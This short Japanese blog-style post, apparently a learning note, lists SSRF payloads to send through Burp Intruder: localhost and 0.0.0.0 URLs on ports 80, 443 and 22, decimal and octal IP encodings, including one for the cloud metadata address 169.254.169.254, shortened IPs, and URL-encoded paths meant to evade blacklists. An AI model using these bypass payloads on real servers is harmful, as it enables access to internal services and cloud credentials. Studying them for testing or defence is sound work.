Hello there, ('ω')ノ

 

SSRFにもたくさんのペイロードがあって。

 

 

リクエストをIntruderへ。

 

 

まずは、基本的なペイロードを。

　http://127.0.0.1:80

　http://127.0.0.1:443

　http://127.0.0.1:22

　http://0.0.0.0:80

　http://0.0.0.0:443

　http://0.0.0.0:22

 

 

結果は、以下のとおりで。

 

 

次に10進数のIPロケーションを使用してバイパスするペイロードを。

　http://0177.0.0.1/

　http://2130706433/ ⇦ http://127.0.0.1

　http://3232235521/ ⇦ http://192.168.0.1

　http://3232235777/ ⇦ http://192.168.1.1

　http://2852039166/ ⇦ http://169.254.169.254

 

それから、ゼロを削除してIPアドレスを短縮してバイパスするペイロードを。

　http://0/

　http://127.1

　http://127.0.1

 

 

さらには、特定のURLをシングルまたはダブルエンコードして。

ブラックリストをバイパスするペイロードを。

　http://127.0.0.1/%61dmin

　http://127.0.0.1/%2561dmin

 

 

Best regards, (^^ゞ